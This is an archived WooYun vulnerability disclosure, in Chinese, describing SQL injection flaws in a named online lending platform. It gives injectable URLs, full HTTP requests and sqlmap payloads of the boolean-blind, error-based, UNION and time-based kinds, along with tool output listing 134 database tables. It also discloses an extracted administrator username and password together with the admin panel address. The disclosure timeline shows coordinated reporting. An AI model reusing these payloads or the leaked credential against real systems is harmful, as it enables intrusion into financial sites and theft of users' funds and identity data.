乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-30: 细节已通知厂商并且等待厂商处理中 2015-03-30: 厂商已经确认,细节仅向厂商公开 2015-04-09: 细节向核心白帽子及相关领域专家公开 2015-04-19: 细节向普通白帽子公开 2015-04-29: 细节向实习白帽子公开 2015-05-14: 细节向公众公开
OK速贷多处高危漏洞可进后台资金数千万(泄漏用户资金、身份认证信息等)
注入一:
GET /?plugins&q=areas&area_id=174 HTTP/1.1Accept-Language: zh-CN,zh;q=0.8,en;q=0.6Accept-Encoding: gzip,deflateCache-Control: max-age=0Host: www1.okisbank.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36DNT: 1Connection: closeCookie: PHPSESSID=ja1oli3mo1pdjfmpfi8qitrfv3; _jzqx=1.1426652708.1426652708.1.jzqsr=okisbank%2Ecom|jzqct=/user/login%2Ehtml.-; _jzqckmp=1; _ga=GA1.2.264870878.1426652708; _jzqa=1.1246666155320797000.1426652708.1426652708.1426735724.2; _jzqc=1; LXB_REFER=74.125.227.77; _jzqb=1.4.10.1426735724.1; Hm_lvt_0fed600eaace02a001f9ebf0a244f274=1426651774,1426654101,1426654412,1426736984; Hm_lpvt_0fed600eaace02a001f9ebf0a244f274=1426737794; dy_cookie_time=604800; 6ec6cef6a06f93620f0bd7d4d7d741d6=bab4m9R8As45YzkwT%2FjAdIivXGmOFOW8KgPRwOwCjy3WF373l%2BD1rX%2BO0gwAlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
注入二:http://www1.okisbank.com/u/215'注入三:http://www1.okisbank.com/?user&q=code/borrow/loan&p=repay&type=tender&username=189 用户界面带搜索的地方几乎全有注射例如:http://www1.okisbank.com/?user&q=code/borrow/tender&p=now&keywords=111%27&dotime1=2015-03-19&dotime2=2015-03-19
Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND 1731=1731 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND (SELECT 5321 FROM(SELECT COUNT(*),CONCAT(0x7163706271,(SELECT (CASE WHEN (5321=5321) THEN 1 ELSE 0 END)),0x7166796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7163706271,0x4f694676505649465261,0x7166796971),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND SLEEP(5)---[12:18:42] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0[12:18:42] [INFO] fetching tables for database: 'okisbank'Database: okisbank[134 tables]+------------------------------------+| deayou_account || deayou_account_balance || deayou_account_bank || deayou_account_cash || deayou_account_fee || deayou_account_fee_type || deayou_account_log || deayou_account_payment || deayou_account_recharge || deayou_account_users || deayou_account_users_bank || deayou_account_web || deayou_approve || deayou_approve_edu || deayou_approve_edu_id5 || deayou_approve_id5 || deayou_approve_realname || deayou_approve_sms || deayou_approve_smslog || deayou_approve_video || deayou_areas || deayou_articles || deayou_articles_pages || deayou_articles_type || deayou_attestations || deayou_attestations_type || deayou_attestations_user || deayou_borrow || deayou_borrow_activity || deayou_borrow_amount || deayou_borrow_amount_apply || deayou_borrow_amount_log || deayou_borrow_amount_type || deayou_borrow_auto || deayou_borrow_autolog || deayou_borrow_care || deayou_borrow_change || deayou_borrow_count || deayou_borrow_count_log || deayou_borrow_credit || deayou_borrow_fee || deayou_borrow_fee_log || deayou_borrow_fee_type || deayou_borrow_flag || deayou_borrow_recover || deayou_borrow_repay || deayou_borrow_roam || deayou_borrow_style || deayou_borrow_tender || deayou_borrow_tender_auto || deayou_borrow_tender_autolog || deayou_borrow_tender_web || deayou_borrow_type || deayou_borrow_verify || deayou_borrow_vouch || deayou_borrow_vouch_recover || deayou_borrow_vouch_repay || deayou_comment || deayou_comments || deayou_credit || deayou_credit_class || deayou_credit_log || deayou_credit_rank || deayou_credit_type || deayou_dw_activity_review || deayou_group || deayou_group_articles || deayou_group_comments || deayou_group_log || deayou_group_member || deayou_group_type || deayou_linkages || deayou_linkages_class || deayou_linkages_type || deayou_links || deayou_links_type || deayou_luckmember_addcount_history || deayou_luckmember_award_address || deayou_luckmember_award_history || deayou_luckmember_count || deayou_message || deayou_message_receive || deayou_modules || deayou_rating_assets || deayou_rating_company || deayou_rating_contact || deayou_rating_educations || deayou_rating_finance || deayou_rating_houses || deayou_rating_info || deayou_rating_job || deayou_remind || deayou_remind_log || deayou_remind_type || deayou_remind_user || deayou_scrollpic || deayou_scrollpic_type || deayou_site || deayou_site_menu || deayou_sms_type || deayou_spread_add || deayou_spread_log || deayou_spreads_log || deayou_spreads_set || deayou_spreads_users || deayou_system || deayou_system_auto || deayou_system_type || deayou_ucenter || deayou_ucenter_set || deayou_users || deayou_users_admin || deayou_users_admin_type || deayou_users_adminlog || deayou_users_care || deayou_users_care_user || deayou_users_email || deayou_users_email_log || deayou_users_examines || deayou_users_friends || deayou_users_friends_invite || deayou_users_friends_type || deayou_users_info || deayou_users_log || deayou_users_qq || deayou_users_rebut || deayou_users_reglog || deayou_users_sina || deayou_users_type || deayou_users_upfiles || deayou_users_vip || deayou_users_viplog || deayou_users_visit || deayou_weixin |+------------------------------------+
注入出管理员账号:ok速贷ok123http://www1.okisbank.com/?admin
*****58f7a9.jpg" alt="1672_ap*****
危害等级:中
漏洞Rank:8
确认时间:2015-03-30 17:28
感谢提交漏洞的作者,我们一定做好网站漏洞修复与防御机制。
暂无